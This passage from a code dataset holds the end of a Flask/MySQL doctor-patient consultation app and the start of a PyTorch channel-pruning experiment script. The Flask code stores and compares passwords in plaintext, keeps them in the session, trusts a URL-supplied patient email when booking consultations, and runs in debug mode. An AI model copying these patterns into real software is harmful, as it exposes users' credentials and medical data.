session['s_pwd'] = account['pwd']\n return render_template('index.html', doctor=doctor, len=len(doctor), patient=account, c=c, status=status, len1=len1, queries=queries, len2=len(queries))\n else:\n return render_template('login.html', msg='incorrect username/password')\n\n elif 's_mail' in session:\n mail = session.get('s_mail')\n pwd = session.get('s_pwd')\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('select * from consult where patient_mail= %s', [mail])\n consult = cursor.fetchall()\n\n c = []\n for i in range(0, len(consult)):\n c.append(consult[i]['doctor_id'])\n\n cursor.execute(\n \"SELECT distinct a.name , a.dept, a.link, b.status , b.timing from doctor a, consult b where a.id=b.doctor_id and b.patient_mail= %s \", [mail])\n\n status = cursor.fetchall()\n\n cursor.execute(\n 'select * from patient where mail= %s and pwd =%s', (mail, pwd))\n account = cursor.fetchone()\n\n cursor.execute('select * from queries')\n queries = cursor.fetchall()\n\n cursor.execute('select * from doctor')\n doctor = cursor.fetchall()\n\n return render_template('index.html', doctor=doctor, len=len(doctor), patient=account, c=c, status=status,\n len1=len(status), queries=queries, len2=len(queries))\n\n else:\n return redirect(url_for('login'))\n\n\n@app.route(\"/consult\", methods=[\"POST\", \"GET\"])\ndef consult():\n if 's_mail' in session:\n patient_mail = request.args.get('a')\n doctor_id = request.args.get('b')\n # print(patient_mail)\n # print(doctor_id)\n\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\n 'insert into consult (patient_mail,doctor_id) values (%s,%s)', (patient_mail, doctor_id))\n mysql.connection.commit()\n return redirect(url_for('home'))\n\n else:\n return redirect(url_for('login'))\n\n\n@app.route(\"/update\", methods=[\"POST\", \"GET\"])\ndef update():\n if 's_mail' in session and request.method == 'POST':\n name = request.form['name']\n age = request.form['age']\n gender = request.form['gender']\n location = request.form['location']\n BMI = request.form['bmi']\n mail = session.get('s_mail')\n\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('update patient set name = %s , age=%s, gender= %s , location=%s , BMI=%s where mail =%s',\n (name, age, gender, location, BMI, mail))\n mysql.connection.commit()\n return redirect(url_for('home'))\n else:\n return redirect(url_for('login'))\n\n\n@app.route('/askquery', methods=[\"POST\", \"GET\"])\ndef askquery():\n if 's_mail' in session and request.method == 'POST':\n usrquestion = request.form['usrquestion']\n\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\n 'insert into queries (question) values(%s)', [usrquestion])\n mysql.connection.commit()\n return redirect(url_for('home'))\n else:\n return redirect(url_for('login'))\n\n\n@app.route('/logout/')\ndef logout():\n if 's_mail' in session:\n # Remove session data, this will log the user out\n session.clear()\n\n # Redirect to login page\n return redirect(url_for('login'))\n\n\n@app.route('/doctor', methods=[\"POST\", \"GET\"])\ndef doctorLogin():\n msg = ''\n if request.method == 'POST' and 'mail' in request.form:\n mail = request.form['mail']\n pwd = request.form['pwd']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\n 'select * from doctor where mail= %s and pwd =%s', (mail, pwd))\n doctor = cursor.fetchone()\n if doctor:\n session['loggedin'] = True\n session['d_id'] = doctor['id']\n session['d_pwd'] = doctor['pwd']\n return redirect(url_for('docpage'))\n else:\n return render_template('doctor_login.html', msg='Invalid Credentials')\n\n return render_template('doctor_login.html', msg='')\n\n\n@app.route('/docpage/')\ndef docpage():\n if 'd_id' in session:\n id = session.get('d_id')\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('select * from doctor where id= %s ', [id])\n doctor = cursor.fetchone()\n\n cursor.execute('select * from queries')\n queries = cursor.fetchall()\n\n cursor.execute('SELECT a.name , b.patient_mail ,b.status,b.timing from patient a, consult b where a.mail = b.patient_mail and b.doctor_id= %s and b.status=%s', (id, 'Accepted'))\n check = cursor.fetchall()\n if check:\n check = len(check)\n else:\n check = 0\n cursor.execute(\n 'SELECT a.name , b.patient_mail ,b.status,b.timing from patient a, consult b where a.mail = b.patient_mail and b.doctor_id= %s ', [id])\n reques = cursor.fetchall()\n\n return render_template('doctor_main_page.html', reques=reques, len=len(reques), doctor=doctor, check=check, queries=queries, len2=len(queries))\n else:\n return render_template('doctor_login.html', msg='')\n\n\n@app.route('/consult_update', methods=[\"POST\", \"GET\"])\ndef consult_update():\n if 'd_id' in session and request.method == 'POST':\n id = session.get('d_id')\n patient_mail = request.form['patient_mail']\n bday = request.form['bday']\n timing = request.form['timing']\n\n timing = bday + \" \"+timing\n status = 'Accepted'\n\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('update consult set status = %s, timing=%s where patient_mail = %s and doctor_id = %s',\n (status, timing, patient_mail, id))\n mysql.connection.commit()\n return redirect(url_for('docpage'))\n else:\n return render_template('doctor_login.html', msg='')\n\n\n@app.route('/answerquery', methods=[\"POST\", \"GET\"])\ndef answerquery():\n if 'd_id' in session and request.method == 'POST':\n sno = request.form['sno']\n answer = request.form['answer']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\n 'update queries set answer = %s, status = %s where sno= %s ', (answer, 'answered', sno))\n mysql.connection.commit()\n return redirect(url_for('docpage'))\n else:\n return render_template('doctor_login.html', msg='')\n\n\n@app.route('/doctorLogout/')\ndef doctorLogout():\n if 'd_id' in session:\n # Remove session data, this will log the user out\n session.clear()\n\n # Redirect to login page\n return redirect(url_for('doctorLogin'))\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"81237821","text":"import argparse\nimport copy\nimport datetime\nimport logging\nimport math\nimport os\nimport sys\nimport time\n\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nimport torch.utils.data\nimport torch.utils.data.distributed\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\nfrom option import Option\nfrom trainer import SegmentWiseTrainer, NetworkWiseTrainer\nfrom checkpoint import CheckPoint\n\nimport dcp.models as md\nimport dcp.utils as utils\nfrom dcp.mask_conv import MaskConv2d\nfrom dcp.models.preresnet import PreBasicBlock\nfrom dcp.models.resnet import BasicBlock, Bottleneck\nfrom visdom_logger.logger import VisdomLogger\n\nblock_num = {'vgg19': 19, 'lenet5':5, 'preresnet56': 27, 'preresnet18': 8, 'preresnet8': 3, 'resnet18': 8, 'resnet50': 16}\nfrom visdom_logger.logger import VisdomLogger\nfrom thop import profile\nclass LoggerForSacred():\n def __init__(self, visdom_logger, id, ex_logger=None):\n self.visdom_logger = visdom_logger\n self.ex_logger = ex_logger\n self.id = id\n\n\n def log_scalar(self, metrics_name, value, step):\n if self.visdom_logger is not None:\n self.visdom_logger.scalar(metrics_name + \"_{}\".format(self.id), step, [value])\n if self.ex_logger is not None:\n self.ex_logger.log_scalar(metrics_name + \"_{}\".format(self.id), value, step)\n\nclass Experiment(object):\n \"\"\"\n run experiments with pre-defined pipeline\n \"\"\"\n\n def __init__(self, options=None, conf_path=None, logger=None):\n self.settings = options or Option(conf_path)\n self.checkpoint = None\n self.train_loader = None\n self.val_loader = None\n self.ori_model = None\n self.pruned_model = None\n self.segment_wise_trainer = None\n\n self.aux_fc_state = None\n self.aux_fc_opt_state = None\n self.seg_opt_state = None\n self.current_pivot_index = None\n self.is_segment_wise_finetune = False\n self.is_channel_selection = False\n\n self.epoch = 0\n\n self.feature_cache_origin = {}\n self.feature_cache_pruned = {}\n\n self.settings.set_save_path()\n self.write_settings()\n self.logger = self.set_logger()\n self.v_logger = logger\n\n self.prepare()\n\n def write_settings(self):\n \"\"\"\n save experimental settings to a file\n \"\"\"\n\n with open(os.path.join(self.settings.save_path, \"settings.log\"), \"w\") as f:\n for k, v in self.settings.__dict__.items():\n f.write(str(k) + \": \" + str(v) + \"\\n\")\n\n def set_logger(self):\n \"\"\"\n initialize logger\n \"\"\"\n logger = logging.getLogger('channel_selection')\n file_formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s')\n console_formatter = logging.Formatter('%(message)s')\n # file log\n file_handler = logging.FileHandler(os.path.join(self.settings.save_path, \"train_test.log\"))\n file_handler.setFormatter(file_formatter)\n\n # console log\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(console_formatter)\n\n logger.addHandler(file_handler)\n logger.addHandler(console_handler)\n\n logger.setLevel(logging.INFO)\n return logger\n\n def prepare(self):\n \"\"\"\n preparing experiments\n \"\"\"\n\n self._set_gpu()\n self._set_dataloader()\n self._set_model()\n self._cal_pivot()\n self._set_checkpoint()\n self._set_trainier()\n\n def _set_gpu(self):\n \"\"\"\n initialize the seed of random number generator\n \"\"\"\n\n # set torch seed\n # init random seed\n torch.manual_seed(self.settings.seed)\n torch.cuda.manual_seed(self.settings.seed)\n torch.cuda.set_device(0)\n cudnn.benchmark = True\n\n def _set_dataloader(self):\n \"\"\"\n create train loader and validation loader for channel pruning\n \"\"\"\n\n if self.settings.dataset == 'cifar10':\n data_root = os.path.join(self.settings.data_path, \"cifar\")\n\n norm_mean = [0.49139968, 0.48215827, 0.44653124]\n norm_std = [0.24703233, 0.24348505, 0.26158768]\n train_transform = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(norm_mean, norm_std)])\n val_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(norm_mean, norm_std)])\n\n train_dataset = datasets.CIFAR10(root=data_root,\n train=True,\n transform=train_transform,\n download=True)\n val_dataset = datasets.CIFAR10(root=data_root,\n train=False,\n transform=val_transform)\n\n self.train_loader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=self.settings.batch_size,\n shuffle=True,\n pin_memory=True,\n num_workers=self.settings.n_threads)\n self.val_loader = torch.utils.data.DataLoader(dataset=val_dataset,\n batch_size=self.settings.batch_size,\n shuffle=False,\n pin_memory=True,\n num_workers=self.settings.n_threads)\n\n elif self.settings.dataset == 'mnist':\n\n transform_train = transforms.Compose([\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n\n transform_test = transforms.Compose([\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n\n trainset = datasets.MNIST(root='./data', train=True, download=True, transform=transform_train)\n self.train_loader = torch.utils.data.DataLoader(trainset, batch_size=self.settings.batch_size, shuffle=True, num_workers=1)\n\n testset = datasets.MNIST(root='./data', train=False, download=True, transform=transform_test)\n self.val_loader = torch.utils.data.DataLoader(testset, batch_size=self.settings.batch_size, shuffle=True, num_workers=1)\n self.is_mnist = True\n\n elif self.settings.dataset == 'imagenet':\n dataset_path = os.path.join(self.settings.data_path, \"imagenet\")\n traindir = os.path.join(dataset_path, \"train\")\n valdir = os.path.join(dataset_path, 'val')\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n self.train_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(\n traindir,\n transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=self.settings.batch_size,\n shuffle=True,\n num_workers=self.settings.n_threads,\n pin_memory=True)\n\n self.val_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(valdir, transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=self.settings.batch_size,\n shuffle=False,\n num_workers=self.settings.n_threads,\n pin_memory=True)\n\n def _set_trainier(self):\n \"\"\"\n initialize segment-wise trainer trainer\n \"\"\"\n\n # initialize segment-wise trainer\n self.segment_wise_trainer = SegmentWiseTrainer(ori_model=self.ori_model,\n pruned_model=self.pruned_model,\n train_loader=self.train_loader,\n val_loader=self.val_loader,\n settings=self.settings,\n logger=self.logger,\n v_logger=self.v_logger)\n if self.aux_fc_state is not None:\n self.segment_wise_trainer.update_aux_fc(self.aux_fc_state, self.aux_fc_opt_state, self.seg_opt_state)\n\n def _set_model(self):\n \"\"\"\n get model\n \"\"\"\n\n if self.settings.dataset in [\"cifar10\", \"cifar100\"]:\n if self.settings.net_type == \"preresnet\":\n self.ori_model = md.PreResNet(depth=self.settings.depth, num_classes=self.settings.n_classes)\n self.pruned_model = md.PreResNet(depth=self.settings.depth, num_classes=self.settings.n_classes)\n if self.settings.net_type == 'vgg':\n self.ori_model = md.VGG_CIFAR(depth=self.settings.depth, num_classes=self.settings.n_classes)\n self.pruned_model = md.VGG_CIFAR(depth=self.settings.depth, num_classes=self.settings.n_classes)\n else:\n assert False, \"use {} data while network is {}\".format(self.settings.dataset, self.settings.net_type)\n\n elif self.settings.dataset in [\"mnist\"]:\n self.is_mnist = True\n if self.settings.net_type == \"preresnet\":\n self.ori_model = md.PreResNet(depth=self.settings.depth, num_classes=self.settings.n_classes, is_mnist=self.is_mnist)\n self.pruned_model = md.PreResNet(depth=self.settings.depth, num_classes=self.settings.n_classes, is_mnist=self.is_mnist)\n elif self.settings.net_type == 'lenet':\n self.ori_model = md.LeNet5()\n self.pruned_model = md.LeNet5()\n else:\n assert False, \"use {} data while network is {}\".format(self.settings.dataset, self.settings.net_type)\n\n elif self.settings.dataset in [\"imagenet\"]:\n if self.settings.net_type == \"resnet\":\n self.ori_model = md.ResNet(depth=self.settings.depth, num_classes=self.settings.n_classes)\n self.pruned_model = md.ResNet(depth=self.settings.depth, num_classes=self.settings.n_classes)\n else:\n assert False, \"use {} data while network is {}\".format(self.settings.dataset, self.settings.net_type)\n\n else:\n assert False, \"unsupported data set: {}\".format(self.settings.dataset)\n\n def _set_checkpoint(self):\n \"\"\"\n load pre-trained model or resume checkpoint\n \"\"\"\n\n assert self.ori_model is not None and self.pruned_model is not None, \"please create model first\"\n\n self.checkpoint = CheckPoint(self.settings.save_path, self.logger)\n self._load_retrain()\n self._load_resume()\n\n def _load_retrain(self):\n \"\"\"\n load pre-trained model\n \"\"\"\n\n if self.settings.retrain is not None:\n check_point_params = torch.load(self.settings.retrain)\n if \"ori_model\" not in check_point_params:\n model_state = check_point_params\n self.ori_model = self.checkpoint.load_state(self.ori_model, model_state)\n self.pruned_model = self.checkpoint.load_state(self.pruned_model, model_state)\n self.logger.info(\"|===>load restrain file: {}\".format(self.settings.retrain))\n else:\n ori_model_state = check_point_params[\"ori_model\"]\n pruned_model_state = check_point_params[\"pruned_model\"]\n # self.current_block_count = check_point_params[\"current_pivot\"]\n self.aux_fc_state = check_point_params[\"aux_fc\"]\n # self.replace_layer()\n self.ori_model = self.checkpoint.load_state(self.ori_model, ori_model_state)\n self.pruned_model = self.checkpoint.load_state(self.pruned_model, pruned_model_state)\n self.logger.info(\"|===>load pre-trained model: {}\".format(self.settings.retrain))\n\n def _load_resume(self):\n \"\"\"\n load resume checkpoint\n \"\"\"\n\n if self.settings.resume is not None:\n check_point_params = torch.load(self.settings.resume)\n ori_model_state = check_point_params[\"ori_model\"]\n pruned_model_state = check_point_params[\"pruned_model\"]\n self.aux_fc_state = check_point_params[\"aux_fc\"]\n self.aux_fc_opt_state = check_point_params[\"aux_fc_opt\"]\n self.seg_opt_state = check_point_params[\"seg_opt\"]\n self.current_pivot_index = check_point_params[\"current_pivot\"]\n self.is_segment_wise_finetune = check_point_params[\"segment_wise_finetune\"]\n self.is_channel_selection = check_point_params[\"channel_selection\"]\n self.epoch = check_point_params[\"epoch\"]\n self.epoch = self.settings.segment_wise_n_epochs\n self.current_block_count = check_point_params[\"current_block_count\"]\n\n if self.is_channel_selection or \\\n (self.is_segment_wise_finetune and self.current_pivot_index > self.settings.pivot_set[0]):\n self.replace_layer()\n self.ori_model = self.checkpoint.load_state(self.ori_model, ori_model_state)\n self.pruned_model = self.checkpoint.load_state(self.pruned_model, pruned_model_state)\n self.logger.info(\"|===>load resume file: {}\".format(self.settings.resume))\n\n def _cal_pivot(self):\n \"\"\"\n calculate the inserted layer for additional loss\n \"\"\"\n\n self.num_segments = self.settings.n_losses + 1\n num_block_per_segment = (block_num[self.settings.net_type + str(self.settings.depth)] // self.num_segments) + 1\n pivot_set = []\n for i in range(self.num_segments - 1):\n pivot_set.append(num_block_per_segment * (i + 1))\n self.settings.pivot_set = pivot_set\n self.logger.info(\"pivot set: {}\".format(pivot_set))\n\n def segment_wise_fine_tune(self, index):\n \"\"\"\n conduct segment-wise fine-tuning\n :param index: segment index\n \"\"\"\n\n best_top1 = 100\n best_top5 = 100\n\n start_epoch = 0\n if self.is_segment_wise_finetune and self.epoch != 0:\n start_epoch = self.epoch + 1\n self.epoch = 0\n for epoch in range(start_epoch, self.settings.segment_wise_n_epochs):\n train_error, train_loss, train5_error = self.segment_wise_trainer.train(epoch, index)\n val_error, val_loss, val5_error = self.segment_wise_trainer.val(epoch)\n\n # write and print result\n if isinstance(train_error, list):\n best_flag = False\n if best_top1 >= val_error[-1]:\n best_top1 = val_error[-1]\n best_top5 = val5_error[-1]\n best_flag = True\n\n else:\n best_flag = False\n if best_top1 >= val_error:\n best_top1 = val_error\n best_top5 = val5_error\n best_flag = True\n\n if best_flag:\n self.checkpoint.save_model(ori_model=self.ori_model, pruned_model=self.pruned_model,\n aux_fc=self.segment_wise_trainer.aux_fc,\n current_pivot=self.current_pivot_index,\n segment_wise_finetune=True, index=index)\n\n self.logger.info(\"|===>Best Result is: Top1 Error: {:f}, Top5 Error: {:f}\\n\".format(best_top1, best_top5))\n self.logger.info(\"|===>Best Result is: Top1 Accuracy: {:f}, Top5 Accuracy: {:f}\\n\".format(100 - best_top1,\n 100 - best_top5))\n\n if self.settings.dataset in [\"imagenet\"]:\n self.checkpoint.save_checkpoint(ori_model=self.ori_model,\n pruned_model=self.pruned_model,\n aux_fc=self.segment_wise_trainer.aux_fc,\n aux_fc_opt=self.segment_wise_trainer.fc_optimizer,\n seg_opt=self.segment_wise_trainer.seg_optimizer,\n current_pivot=self.current_pivot_index,\n segment_wise_finetune=True, index=index, epoch=epoch)\n else:\n self.checkpoint.save_checkpoint(ori_model=self.ori_model,\n pruned_model=self.pruned_model,\n aux_fc=self.segment_wise_trainer.aux_fc,\n aux_fc_opt=self.segment_wise_trainer.fc_optimizer,\n seg_opt=self.segment_wise_trainer.seg_optimizer,\n current_pivot=self.current_pivot_index,\n segment_wise_finetune=True, index=index)\n\n def replace_layer(self):\n \"\"\"\n Replace the convolutional layer to mask convolutional layer\n \"\"\"\n\n block_count = 0\n if self.settings.net_type in [\"preresnet\", \"resnet\"]:\n for module in self.pruned_model.modules():\n if isinstance(module, (PreBasicBlock, BasicBlock, Bottleneck)):\n block_count += 1\n layer = module.conv2\n if block_count <= self.current_block_count and not isinstance(layer, MaskConv2d):\n temp_conv = MaskConv2d(\n in_channels=layer.in_channels,\n out_channels=layer.out_channels,\n kernel_size=layer.kernel_size,\n stride=layer.stride,\n padding=layer.padding,\n bias=(layer.bias is not None))\n temp_conv.weight.data.copy_(layer.weight.data)\n\n if layer.bias is not None:\n temp_conv.bias.data.copy_(layer.bias.data)\n module.conv2 = temp_conv\n\n if isinstance(module, Bottleneck):\n layer = module.conv3\n if block_count <= self.current_block_count and not isinstance(layer, MaskConv2d):\n temp_conv = MaskConv2d(\n in_channels=layer.in_channels,\n out_channels=layer.out_channels,\n kernel_size=layer.kernel_size,\n stride=layer.stride,\n padding=layer.padding,\n bias=(layer.bias is not None))\n temp_conv.weight.data.copy_(layer.weight.data)\n\n if layer.bias is not None:\n temp_conv.bias.data.copy_(layer.bias.data)\n module.conv3 = temp_conv\n elif self.settings.net_type in ['vgg', 'lenet']:\n for module in self.pruned_model.features.modules():\n if isinstance(module, (nn.Conv2d)):\n block_count += 1\n layer = module\n if block_count <= self.current_block_count and not isinstance(layer, MaskConv2d): \n temp_conv = MaskConv2d(\n in_channels=layer.in_channels,\n out_channels=layer.out_channels,\n kernel_size=layer.kernel_size,\n stride=layer.stride,\n padding=layer.padding,\n bias=(layer.bias is not None))\n temp_conv.weight.data.copy_(layer.weight.data)\n\n if layer.bias is not None:\n temp_conv.bias.data.copy_(layer.bias.data)\n module = temp_conv\n\n def channel_selection(self):\n \"\"\"\n conduct channel selection\n \"\"\"\n\n # get testing error\n self.segment_wise_trainer.val(0)\n time_start = time.time()\n\n restart_index = None\n # find restart segment index\n if self.current_pivot_index:\n if self.current_pivot_index in self.settings.pivot_set:\n restart_index = self.settings.pivot_set.index(self.current_pivot_index)\n else:\n restart_index = len(self.settings.pivot_set)\n\n for index in range(self.num_segments):\n if self.segment_wise_trainer.pruned_segments[index] is None:\n continue\n if restart_index is not None:\n if index < restart_index:\n continue\n elif index == restart_index:\n if self.is_channel_selection and self.current_block_count == self.current_pivot_index:\n self.is_channel_selection = False\n continue\n\n if index == self.num_segments - 1:\n self.current_pivot_index = self.segment_wise_trainer.final_block_count\n else:\n self.current_pivot_index = self.settings.pivot_set[index]\n\n # fine tune the network with additional loss and final loss\n if (not self.is_segment_wise_finetune and not self.is_channel_selection) or \\\n (self.is_segment_wise_finetune and self.epoch != self.settings.segment_wise_n_epochs - 1):\n self.segment_wise_fine_tune(index)\n else:\n self.is_segment_wise_finetune = False\n\n # load best model\n best_model_path = os.path.join(self.checkpoint.save_path, 'model_{:0>3d}_swft.pth'.format(index))\n check_point_params = torch.load(best_model_path)\n ori_model_state = check_point_params[\"ori_model\"]\n pruned_model_state = check_point_params[\"pruned_model\"]\n aux_fc_state = check_point_params[\"aux_fc\"]\n self.ori_model = self.checkpoint.load_state(self.ori_model, ori_model_state)\n self.pruned_model = self.checkpoint.load_state(self.pruned_model, pruned_model_state)\n self.segment_wise_trainer.update_model(self.ori_model, self.pruned_model, aux_fc_state)\n\n # replace the baseline model\n if index == 0:\n if self.settings.net_type in ['preresnet']:\n self.ori_model.conv = copy.deepcopy(self.pruned_model.conv)\n for ori_module, pruned_module in zip(self.ori_model.modules(), self.pruned_model.modules()):\n if isinstance(ori_module, PreBasicBlock):\n ori_module.bn1 = copy.deepcopy(pruned_module.bn1)\n ori_module.bn2 = copy.deepcopy(pruned_module.bn2)\n ori_module.conv1 = copy.deepcopy(pruned_module.conv1)\n ori_module.conv2 = copy.deepcopy(pruned_module.conv2)\n if ori_module.downsample is not None:\n ori_module.downsample = copy.deepcopy(pruned_module.downsample)\n self.ori_model.bn = copy.deepcopy(self.pruned_model.bn)\n self.ori_model.fc = copy.deepcopy(self.pruned_model.fc)\n elif self.settings.net_type in ['resnet']:\n self.ori_model.conv1 = copy.deepcopy(self.pruned_model.conv)\n self.ori_model.bn1 = copy.deepcopy(self.pruned_model.bn1)\n for ori_module, pruned_module in zip(self.ori_model.modules(), self.pruned_model.modules()):\n if isinstance(ori_module, BasicBlock):\n ori_module.conv1 = copy.deepcopy(pruned_module.conv1)\n ori_module.conv2 = copy.deepcopy(pruned_module.conv2)\n ori_module.bn1 = copy.deepcopy(pruned_module.bn1)\n ori_module.bn2 = copy.deepcopy(pruned_module.bn2)\n if ori_module.downsample is not None:\n ori_module.downsample = copy.deepcopy(pruned_module.downsample)\n if isinstance(ori_module, Bottleneck):\n ori_module.conv1 = copy.deepcopy(pruned_module.conv1)\n ori_module.conv2 = copy.deepcopy(pruned_module.conv2)\n ori_module.conv3 = copy.deepcopy(pruned_module.conv3)\n ori_module.bn1 = copy.deepcopy(pruned_module.bn1)\n ori_module.bn2 = copy.deepcopy(pruned_module.bn2)\n ori_module.bn3 = copy.deepcopy(pruned_module.bn3)\n if ori_module.downsample is not None:\n ori_module.downsample = copy.deepcopy(pruned_module.downsample)\n self.ori_model.fc = copy.deepcopy(self.pruned_model.fc)\n elif self.settings.net_type in ['vgg', 'lenet']:\n for ori_module, pruned_module in zip (self.ori_model.modules(), self.pruned_model.modules()):\n if isinstance(ori_module, (nn.Conv2d)):\n ori_module = copy.deepcopy(pruned_module)\n self.ori_model.classifier = copy.deepcopy(self.pruned_model.classifier)\n\n aux_fc_state = []\n for i in range(len(self.segment_wise_trainer.aux_fc)):\n if isinstance(self.segment_wise_trainer.aux_fc[i], nn.DataParallel):\n temp_state = self.segment_wise_trainer.aux_fc[i].module.state_dict()\n else:\n temp_state = self.segment_wise_trainer.aux_fc[i].state_dict()\n aux_fc_state.append(temp_state)\n self.segment_wise_trainer.update_model(self.ori_model, self.pruned_model, aux_fc_state)\n self.segment_wise_trainer.val(0)\n\n # conduct channel selection\n # contains [0:index] segments\n net_origin_list = []\n net_pruned_list = []\n for j in range(index + 1):\n net_origin_list += utils.model2list(self.segment_wise_trainer.ori_segments[j])\n net_pruned_list += utils.model2list(self.segment_wise_trainer.pruned_segments[j])\n\n net_origin = nn.Sequential(*net_origin_list)\n net_pruned = nn.Sequential(*net_pruned_list)\n\n self._seg_channel_selection(\n net_origin=net_origin,\n net_pruned=net_pruned,\n aux_fc=self.segment_wise_trainer.aux_fc[index],\n pivot_index=self.current_pivot_index,\n index=index)\n\n # update optimizer\n aux_fc_state = []\n for i in range(len(self.segment_wise_trainer.aux_fc)):\n if isinstance(self.segment_wise_trainer.aux_fc[i], nn.DataParallel):\n temp_state = self.segment_wise_trainer.aux_fc[i].module.state_dict()\n else:\n temp_state = self.segment_wise_trainer.aux_fc[i].state_dict()\n aux_fc_state.append(temp_state)\n\n self.segment_wise_trainer.update_model(self.ori_model, self.pruned_model, aux_fc_state)\n\n self.checkpoint.save_checkpoint(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n self.segment_wise_trainer.fc_optimizer,\n self.segment_wise_trainer.seg_optimizer,\n self.current_pivot_index,\n channel_selection=True,\n index=index,\n block_count=self.current_pivot_index)\n\n self.logger.info(self.ori_model)\n self.logger.info(self.pruned_model)\n self.segment_wise_trainer.val(0)\n self.current_pivot_index = None\n\n self.checkpoint.save_model(self.ori_model, self.pruned_model,\n self.segment_wise_trainer.aux_fc,\n self.segment_wise_trainer.final_block_count,\n index=self.num_segments)\n\n\n torch.save(self.pruned_model, \"cp_{}_{}_{}_{}.p\".format(self.settings.net_type, self.settings.depth, self.settings.dataset, self.settings.pruning_rate))\n\n time_interval = time.time() - time_start\n log_str = \"cost time: {}\".format(str(datetime.timedelta(seconds=time_interval)))\n\n if self.is_mnist:\n flops, params = profile(self.pruned_model, input_size=(1,1,32,32))\n else:\n lops, params = profile(self.pruned_model, input_size=(1, 3, 32, 32))\n self.v_logger.log_scalar(\"flops_count\", flops,self.v_logger.id)\n self.v_logger.log_scalar(\"params_count\", params, self.v_logger.id)\n self.logger.info(log_str)\n\n def _hook_origin_feature(self, module, input, output):\n gpu_id = str(output.get_device())\n self.feature_cache_origin[gpu_id] = output\n\n def _hook_pruned_feature(self, module, input, output):\n gpu_id = str(output.get_device())\n self.feature_cache_pruned[gpu_id] = output\n\n @staticmethod\n def _concat_gpu_data(data):\n data_cat = data[\"0\"]\n for i in range(1, len(data)):\n data_cat = torch.cat((data_cat, data[str(i)].cuda(0)))\n return data_cat\n\n def _layer_channel_selection(self, net_origin, net_pruned,\n aux_fc, module, block_count, layer_name=\"conv2\"):\n \"\"\"\n conduct channel selection for module\n :param net_origin: original network segments\n :param net_pruned: pruned network segments\n :param aux_fc: auxiliary fully-connected layer\n :param module: the module need to be pruned\n :param block_count: current block no.\n :param layer_name: the name of layer need to be pruned\n \"\"\"\n\n self.logger.info(\"|===>layer-wise channel selection: block-{}-{}\".format(block_count, layer_name))\n\n # layer-wise channel selection\n if self.settings.net_type in ['resnet', 'preresnet']:\n if layer_name == \"conv2\":\n layer = module.conv2\n elif layer_name == \"conv3\":\n layer = module.conv3\n else:\n assert False, \"unsupport layer: {}\".format(layer_name)\n\n if not isinstance(layer, MaskConv2d):\n temp_conv = MaskConv2d(\n in_channels=layer.in_channels,\n out_channels=layer.out_channels,\n kernel_size=layer.kernel_size,\n stride=layer.stride,\n padding=layer.padding,\n bias=(layer.bias is not None))\n temp_conv.weight.data.copy_(layer.weight.data)\n\n if layer.bias is not None:\n temp_conv.bias.data.copy_(layer.bias.data)\n temp_conv.pruned_weight.data.fill_(0)\n temp_conv.d.fill_(0)\n\n if layer_name == \"conv2\":\n module.conv2 = temp_conv\n elif layer_name == \"conv3\":\n module.conv3 = temp_conv\n layer = temp_conv\n\n # define criterion\n\n\n # register hook\n if layer_name == \"conv2\":\n hook_origin = net_origin[block_count].conv2.register_forward_hook(self._hook_origin_feature)\n hook_pruned = module.conv2.register_forward_hook(self._hook_pruned_feature)\n elif layer_name == \"conv3\":\n hook_origin = net_origin[block_count].conv3.register_forward_hook(self._hook_origin_feature)\n hook_pruned = module.conv3.register_forward_hook(self._hook_pruned_feature)\n elif self.settings.net_type in ['vgg', 'lenet']:\n if not isinstance(module, MaskConv2d):\n temp_conv = MaskConv2d(\n in_channels=module.in_channels,\n out_channels=module.out_channels,\n kernel_size=module.kernel_size,\n stride=module.stride,\n padding=module.padding,\n bias=(module.bias is not None))\n temp_conv.weight.data.copy_(module.weight.data)\n\n if module.bias is not None:\n temp_conv.bias.data.copy_(module.bias.data)\n temp_conv.pruned_weight.data.fill_(0)\n temp_conv.d.fill_(0)\n module = temp_conv\n hook_origin = net_origin[block_count].register_forward_hook(self._hook_origin_feature)\n hook_pruned = module.register_forward_hook(self._hook_pruned_feature)\n net_pruned[block_count] = module\n layer = module\n criterion_mse = nn.MSELoss().cuda()\n criterion_softmax = nn.CrossEntropyLoss().cuda()\n net_origin_parallel = utils.data_parallel(net_origin, self.settings.n_gpus)\n net_pruned_parallel = utils.data_parallel(net_pruned, self.settings.n_gpus)\n\n # avoid computing the gradient\n for params in net_origin_parallel.parameters():\n params.requires_grad = False\n for params in net_pruned_parallel.parameters():\n params.requires_grad = False\n\n 